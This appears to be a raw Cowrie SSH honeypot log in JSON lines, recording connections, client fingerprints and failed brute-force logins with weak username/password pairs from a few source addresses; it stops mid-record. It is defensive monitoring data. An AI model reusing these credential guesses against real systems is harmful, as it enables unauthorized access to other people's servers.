{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:33:15.814776Z","src_ip":"212.227.235.229","session":"8eb1e2942020"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123456","message":"login attempt [mongodb/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:33:18.632004Z","src_ip":"212.227.235.229","session":"8eb1e2942020"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59164,"dst_ip":"1.2.3.4","dst_port":22,"session":"fca68391cdeb","protocol":"ssh","message":"New connection: 212.227.125.160:59164 (1.2.3.4:22) [session: fca68391cdeb]","sensor":"my-vps","timestamp":"2025-08-31T05:33:20.284403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:33:20.806140Z","src_ip":"212.227.125.160","session":"fca68391cdeb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:33:20.806912Z","src_ip":"212.227.125.160","session":"fca68391cdeb"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:33:20.967797Z","src_ip":"212.227.235.229","session":"8eb1e2942020"}
{"eventid":"cowrie.login.failed","username":"test1","password":"12345678","message":"login attempt [test1/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T05:33:22.764809Z","src_ip":"212.227.125.160","session":"fca68391cdeb"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:33:24.171625Z","src_ip":"212.227.125.160","session":"fca68391cdeb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36104,"dst_ip":"1.2.3.4","dst_port":22,"session":"e03117f9cf77","protocol":"ssh","message":"New connection: 212.227.125.160:36104 (1.2.3.4:22) [session: e03117f9cf77]","sensor":"my-vps","timestamp":"2025-08-31T05:33:34.844613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:33:37.638189Z","src_ip":"212.227.125.160","session":"e03117f9cf77"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:33:37.665896Z","src_ip":"212.227.125.160","session":"e03117f9cf77"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":54534,"dst_ip":"1.2.3.4","dst_port":22,"session":"16e49cdb4762","protocol":"ssh","message":"New connection: 170.64.166.123:54534 (1.2.3.4:22) [session: 16e49cdb4762]","sensor":"my-vps","timestamp":"2025-08-31T05:33:40.106832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:33:40.107544Z","src_ip":"170.64.166.123","session":"16e49cdb4762"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:33:40.381976Z","src_ip":"170.64.166.123","session":"16e49cdb4762"}
{"eventid":"cowrie.login.failed","username":"app","password":"dell@2020","message":"login attempt [app/dell@2020] failed","sensor":"my-vps","timestamp":"2025-08-31T05:33:41.519112Z","src_ip":"170.64.166.123","session":"16e49cdb4762"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:33:42.796324Z","src_ip":"170.64.166.123","session":"16e49cdb4762"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33478,"dst_ip":"1.2.3.4","dst_port":22,"session":"1509d17fb18f","protocol":"ssh","message":"New connection: 212.227.235.229:33478 (1.2.3.4:22) [session: 1509d17fb18f]","sensor":"my-vps","timestamp":"2025-08-31T05:33:49.912376Z"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:33:53.038621Z","src_ip":"212.227.125.160","session":"e03117f9cf77"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:33:53.625731Z","src_ip":"212.227.235.229","session":"1509d17fb18f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:33:53.626435Z","src_ip":"212.227.235.229","session":"1509d17fb18f"}
{"eventid":"cowrie.session.closed","duration":"22.0","message":"Connection lost after 22.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:33:56.871488Z","src_ip":"212.227.125.160","session":"e03117f9cf77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47840,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfac68ad9336","protocol":"ssh","message":"New connection: 212.227.235.229:47840 (1.2.3.4:22) [session: cfac68ad9336]","sensor":"my-vps","timestamp":"2025-08-31T05:33:57.608088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:33:58.836132Z","src_ip":"212.227.235.229","session":"cfac68ad9336"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:33:58.837009Z","src_ip":"212.227.235.229","session":"cfac68ad9336"}
{"eventid":"cowrie.login.failed","username":"test1","password":"123456789","message":"login attempt [test1/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T05:34:04.623351Z","src_ip":"212.227.235.229","session":"cfac68ad9336"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:34:06.508744Z","src_ip":"212.227.235.229","session":"cfac68ad9336"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59028,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e3c6c6b1880","protocol":"ssh","message":"New connection: 212.227.125.160:59028 (1.2.3.4:22) [session: 1e3c6c6b1880]","sensor":"my-vps","timestamp":"2025-08-31T05:34:13.080796Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37958,"dst_ip":"1.2.3.4","dst_port":22,"session":"179d5ed9850c","protocol":"ssh","message":"New connection: 212.227.125.160:37958 (1.2.3.4:22) [session: 179d5ed9850c]","sensor":"my-vps","timestamp":"2025-08-31T05:34:19.292887Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:34:19.792261Z","src_ip":"212.227.125.160","session":"179d5ed9850c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:34:19.793034Z","src_ip":"212.227.125.160","session":"179d5ed9850c"}
{"eventid":"cowrie.login.failed","username":"test1","password":"123456789","message":"login attempt [test1/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T05:34:21.515582Z","src_ip":"212.227.125.160","session":"179d5ed9850c"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:34:23.091152Z","src_ip":"212.227.125.160","session":"179d5ed9850c"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:34:31.763146Z","src_ip":"212.227.235.229","session":"1509d17fb18f"}
{"eventid":"cowrie.session.closed","duration":"20.1","message":"Connection lost after 20.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:34:33.173349Z","src_ip":"212.227.125.160","session":"1e3c6c6b1880"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33276,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8c8c4ed59e9","protocol":"ssh","message":"New connection: 212.227.235.229:33276 (1.2.3.4:22) [session: f8c8c4ed59e9]","sensor":"my-vps","timestamp":"2025-08-31T05:34:33.705586Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63513,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7f19776893b","protocol":"ssh","message":"New connection: 212.227.125.160:63513 (1.2.3.4:22) [session: d7f19776893b]","sensor":"my-vps","timestamp":"2025-08-31T05:34:36.907780Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T05:34:36.909353Z","src_ip":"212.227.125.160","session":"d7f19776893b"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T05:34:36.991689Z","src_ip":"212.227.125.160","session":"d7f19776893b"}
{"eventid":"cowrie.login.failed","username":"cedric","password":"cedric","message":"login attempt [cedric/cedric] failed","sensor":"my-vps","timestamp":"2025-08-31T05:34:37.365585Z","src_ip":"212.227.125.160","session":"d7f19776893b"}
{"eventid":"cowrie.login.failed","username":"cedric","password":"cedric1","message":"login attempt [cedric/cedric1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:34:38.451330Z","src_ip":"212.227.125.160","session":"d7f19776893b"}
{"eventid":"cowrie.login.failed","username":"cedric","password":"cedric123","message":"login attempt [cedric/cedric123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:34:39.538135Z","src_ip":"212.227.125.160","session":"d7f19776893b"}
{"eventid":"cowrie.login.failed","username":"cedric","password":"cedric1234","message":"login attempt [cedric/cedric1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:34:40.623935Z","src_ip":"212.227.125.160","session":"d7f19776893b"}
{"eventid":"cowrie.login.failed","username":"cedric","password":"cedric12345","message":"login attempt [cedric/cedric12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:34:41.710478Z","src_ip":"212.227.125.160","session":"d7f19776893b"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:34:42.796459Z","src_ip":"212.227.125.160","session":"d7f19776893b"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":36094,"dst_ip":"1.2.3.4","dst_port":22,"session":"6704ea016c75","protocol":"ssh","message":"New connection: 170.64.166.123:36094 (1.2.3.4:22) [session: 6704ea016c75]","sensor":"my-vps","timestamp":"2025-08-31T05:34:55.351198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:34:55.352135Z","src_ip":"170.64.166.123","session":"6704ea016c75"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:34:55.626535Z","src_ip":"170.64.166.123","session":"6704ea016c75"}
{"eventid":"cowrie.session.closed","duration":"66.8","message":"Connection lost after 66.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:34:56.681609Z","src_ip":"212.227.235.229","session":"1509d17fb18f"}
{"eventid":"cowrie.login.failed","username":"redis","password":"aA123456","message":"login attempt [redis/aA123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:34:56.763801Z","src_ip":"170.64.166.123","session":"6704ea016c75"}
{"eventid":"cowrie.session.closed","duration":"23.6","message":"Connection lost after 23.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:34:57.350926Z","src_ip":"212.227.235.229","session":"f8c8c4ed59e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54886,"dst_ip":"1.2.3.4","dst_port":22,"session":"de53068f6208","protocol":"ssh","message":"New connection: 212.227.235.229:54886 (1.2.3.4:22) [session: de53068f6208]","sensor":"my-vps","timestamp":"2025-08-31T05:34:57.368634Z"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:34:58.040633Z","src_ip":"170.64.166.123","session":"6704ea016c75"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:34:58.041560Z","src_ip":"212.227.235.229","session":"de53068f6208"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfou